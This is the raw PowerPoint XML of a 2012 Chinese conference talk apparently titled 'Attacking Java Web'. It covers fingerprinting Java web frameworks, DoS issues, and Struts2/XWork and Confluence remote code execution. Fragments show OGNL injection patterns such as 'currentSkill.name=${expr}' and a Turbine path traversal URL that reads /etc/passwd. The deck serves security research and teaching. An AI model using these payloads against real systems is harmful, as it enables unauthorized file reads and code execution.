              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>{expr2}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty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05382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-0.00312 0.6351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-0.00312 0.6351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6" grpId="2" animBg="1"/>
      <p:bldP spid="7" grpId="0" animBg="1"/>
      <p:bldP spid="7" grpId="1" animBg="1"/>
      <p:bldP spid="11" grpId="0" animBg="1"/>
      <p:bldP spid="11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远程代码执行（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t> xwork2.1.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="911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SHOWCASE</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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611188" y="2276475"/>
            <a:ext cx="7993062" cy="3313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&lt;action name="save" class="org.apache.struts2.showcase.action.SkillAction" method="save"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="28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           &lt;result type="redirect"&gt;edit.action?skillName=${currentSkill.name}&lt;/result&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800">
              <a:solidFill>
                <a:srgbClr val="00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800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>        &lt;/action&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="911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620838"/>
            <a:ext cx="814387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58925"/>
            <a:ext cx="842010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6659563" y="1527175"/>
            <a:ext cx="2233612" cy="5032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56356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远程代码执行（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>xwork2.1.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="921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Xwork1.0.3</a:t>
            </a:r>
          </a:p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1628775"/>
            <a:ext cx="7488237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88</a:t>
            </a:fld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835696" y="2564904"/>
            <a:ext cx="5256584" cy="26642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/>
              <a:t>${${</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="6000" dirty="0" err="1" smtClean="0"/>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="6000" dirty="0" smtClean="0"/>
              <a:t>}}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7949298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远程代码执行（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>xwork1.0.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="931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url?currentSkill.name=${expr}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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86907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默认扩展名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0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b="1" smtClean="0"/>
              <a:t>扩展名“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>*.action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>扩展名“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>*.do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t> ”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>扩展名“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>*.form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t> ”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>扩展名“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>*.vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>扩展名“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>*.jsf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>”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11341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Atlassian Confluence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>远程代码执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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https://cwiki.apache.org/confluence/login.action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Atlassian\Confluence\confluence\WEB-INF\lib\xwork-1.0.3.2.jar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13676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352928" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Atlassian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Confluence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>远程代码执行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91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9638"/>
            <a:ext cx="8568952" cy="595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059832" y="1253331"/>
            <a:ext cx="4032448" cy="5032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6" y="917898"/>
            <a:ext cx="8569001" cy="594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1259632" y="1251744"/>
            <a:ext cx="2952328" cy="5032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516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Struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>远程代码执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="962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Q &amp; A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45676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预见未来</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="972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0"/>
            <a:ext cx="4895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94156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预见未来</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="983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预测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>未来会出现一个远程代码执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>我现在连</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>EXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>都写好了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>重要的是，现在它还没有这个漏洞</a:t>
            </a:r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52813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预见未来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545388" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Turbine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>http://www.inbreak.net/my/turbine/template/pubinfo,infopub,businpub.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>http://www.inbreak.net/my/turbine/template/?template=pubinfo,infopub,businpub.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>http://www.inbreak.net/my/turbine/template/?template=pubinfo,..,..,..,..,..,etc,passwd</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US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63198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预见未来</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003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indexof</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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57338"/>
            <a:ext cx="79216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92714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Indexof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>获取扩展名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1013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,..,..,..,..,..,etc,passwd.htm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403648" y="1543051"/>
            <a:ext cx="4536182" cy="504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72625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我提交了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>BUG</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024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82073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98538"/>
            <a:ext cx="82073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5838"/>
            <a:ext cx="82073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98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11560" y="4437112"/>
            <a:ext cx="5112568" cy="11521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D1EDFF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48376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mtClean="0"/>
              <a:t>预见未来</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034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使用前</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103428" name="图片 3" descr="E:\doc\my\myresearch\x\turbine\使用前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6913562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3139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XCon2012</Template>
  <TotalTime>421</TotalTime>
  <Words>2186</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>484</Paragraphs>
  <Slides>102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3" baseType="lpstr">
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>攻击JAVA WEB</vt:lpstr>
      <vt:lpstr>个人介绍</vt:lpstr>
      <vt:lpstr>适合听众</vt:lpstr>
      <vt:lpstr>JAVA WEB</vt:lpstr>
      <vt:lpstr>JAVA WEB</vt:lpstr>
      <vt:lpstr>JAVA WEB</vt:lpstr>
      <vt:lpstr>开始之前</vt:lpstr>
      <vt:lpstr>框架指纹的手工确认</vt:lpstr>
      <vt:lpstr>默认扩展名</vt:lpstr>
      <vt:lpstr>扩展名“*.action”</vt:lpstr>
      <vt:lpstr>扩展名为“*.do”</vt:lpstr>
      <vt:lpstr>URL路径“/action/xxxx”</vt:lpstr>
      <vt:lpstr>扩展名为“*.form”</vt:lpstr>
      <vt:lpstr>扩展名“*.vm”</vt:lpstr>
      <vt:lpstr>扩展名“*.jsf ”</vt:lpstr>
      <vt:lpstr>参数处理方式   目录</vt:lpstr>
      <vt:lpstr>Struts2 string类型参数处理</vt:lpstr>
      <vt:lpstr>一个参数，变错误页面</vt:lpstr>
      <vt:lpstr>一个参数，变错误页面</vt:lpstr>
      <vt:lpstr>一个参数，变错误页面</vt:lpstr>
      <vt:lpstr>spring mvc有个怪习惯</vt:lpstr>
      <vt:lpstr>spring mvc有个怪习惯</vt:lpstr>
      <vt:lpstr>spring mvc有个怪习惯</vt:lpstr>
      <vt:lpstr>默认URL处理逻辑</vt:lpstr>
      <vt:lpstr>turbine框架的逗号们</vt:lpstr>
      <vt:lpstr>turbine框架的逗号们</vt:lpstr>
      <vt:lpstr>Struts2的叹号们</vt:lpstr>
      <vt:lpstr>Struts2的叹号们</vt:lpstr>
      <vt:lpstr>默认开发命名</vt:lpstr>
      <vt:lpstr>所有框架指纹</vt:lpstr>
      <vt:lpstr>参数类型错误</vt:lpstr>
      <vt:lpstr>参数类型错误</vt:lpstr>
      <vt:lpstr>业务逻辑错误</vt:lpstr>
      <vt:lpstr>业务逻辑错误</vt:lpstr>
      <vt:lpstr>文件名错误</vt:lpstr>
      <vt:lpstr>万能google</vt:lpstr>
      <vt:lpstr>万能google</vt:lpstr>
      <vt:lpstr>环境的影响</vt:lpstr>
      <vt:lpstr>可能的位置</vt:lpstr>
      <vt:lpstr>其他地方</vt:lpstr>
      <vt:lpstr>框架指纹章节</vt:lpstr>
      <vt:lpstr>有多少拒绝服务  目录</vt:lpstr>
      <vt:lpstr>java浮点漏洞</vt:lpstr>
      <vt:lpstr>Struts2 DOS漏洞</vt:lpstr>
      <vt:lpstr>Struts2 DOS漏洞</vt:lpstr>
      <vt:lpstr>Struts2 DOS漏洞</vt:lpstr>
      <vt:lpstr>spring mvc dos</vt:lpstr>
      <vt:lpstr>邪恶的JAVA HASH DOS攻击</vt:lpstr>
      <vt:lpstr>DWR框架DOS攻击</vt:lpstr>
      <vt:lpstr>有多少拒绝服务章节</vt:lpstr>
      <vt:lpstr>鸡肋变绝杀</vt:lpstr>
      <vt:lpstr>提高struts2自定的页面漏洞的发现率</vt:lpstr>
      <vt:lpstr>提高struts2自定的页面漏洞的发现率</vt:lpstr>
      <vt:lpstr>Struts2 XSLT本地代码执行</vt:lpstr>
      <vt:lpstr>velocity本地代码执行（没有报告）</vt:lpstr>
      <vt:lpstr>Velocity远程代码执行</vt:lpstr>
      <vt:lpstr>Velocity远程代码执行</vt:lpstr>
      <vt:lpstr>鸡肋变绝杀章节</vt:lpstr>
      <vt:lpstr>从alert到完美和谐的shellcode 目录</vt:lpstr>
      <vt:lpstr>struts2远程代码执行的局限</vt:lpstr>
      <vt:lpstr>struts2远程代码执行的局限</vt:lpstr>
      <vt:lpstr>struts2远程代码执行的局限</vt:lpstr>
      <vt:lpstr>struts2远程代码执行的局限</vt:lpstr>
      <vt:lpstr>回显研究1（背后的技术）</vt:lpstr>
      <vt:lpstr>回显研究1（背后的技术）</vt:lpstr>
      <vt:lpstr>回显研究1（背后的技术）</vt:lpstr>
      <vt:lpstr>回显研究2（背后的技术）</vt:lpstr>
      <vt:lpstr>回显研究2（背后的技术）</vt:lpstr>
      <vt:lpstr>回显研究2（背后的技术）</vt:lpstr>
      <vt:lpstr>回显研究2（背后的技术）</vt:lpstr>
      <vt:lpstr>回显研究2（背后的技术）</vt:lpstr>
      <vt:lpstr>回显研究3（感谢wofeiwo提醒）</vt:lpstr>
      <vt:lpstr>回显研究3 流程</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>回显研究3 流程</vt:lpstr>
      <vt:lpstr>写教程让那群傻X跟着做</vt:lpstr>
      <vt:lpstr>写教程让那群傻X跟着做</vt:lpstr>
      <vt:lpstr>jboss漏洞的中文版</vt:lpstr>
      <vt:lpstr>jboss漏洞的中文版</vt:lpstr>
      <vt:lpstr>jboss漏洞的中文版</vt:lpstr>
      <vt:lpstr>jboss漏洞的中文版</vt:lpstr>
      <vt:lpstr>jboss漏洞的中文版</vt:lpstr>
      <vt:lpstr>Struts2远程代码执行</vt:lpstr>
      <vt:lpstr>Struts2远程代码执行技术（xwork2.1.2）</vt:lpstr>
      <vt:lpstr>Struts2远程代码执行（xwork2.1.2）</vt:lpstr>
      <vt:lpstr>Struts2远程代码执行技术（xwork2.1.2）</vt:lpstr>
      <vt:lpstr>Struts2远程代码执行（ xwork2.1.2 ）</vt:lpstr>
      <vt:lpstr>Struts2远程代码执行（xwork2.1.2）</vt:lpstr>
      <vt:lpstr>Struts2远程代码执行（xwork1.0.3）</vt:lpstr>
      <vt:lpstr>Atlassian Confluence远程代码执行</vt:lpstr>
      <vt:lpstr>Atlassian Confluence远程代码执行</vt:lpstr>
      <vt:lpstr>Struts2远程代码执行技术</vt:lpstr>
      <vt:lpstr>预见未来</vt:lpstr>
      <vt:lpstr>预见未来</vt:lpstr>
      <vt:lpstr>预见未来</vt:lpstr>
      <vt:lpstr>预见未来</vt:lpstr>
      <vt:lpstr>Indexof获取扩展名</vt:lpstr>
      <vt:lpstr>我提交了一个BUG</vt:lpstr>
      <vt:lpstr>预见未来</vt:lpstr>
      <vt:lpstr>预见未来</vt:lpstr>
      <vt:lpstr>预见未来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攻击JAVA WEB</dc:title>
  <dc:creator>kxlzx</dc:creator>
  <cp:lastModifiedBy>kxlzx kxlzx</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-07-16T03:15:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-08-14T05:01:44Z</dcterms:modified>
</cp:coreProperties>
</file>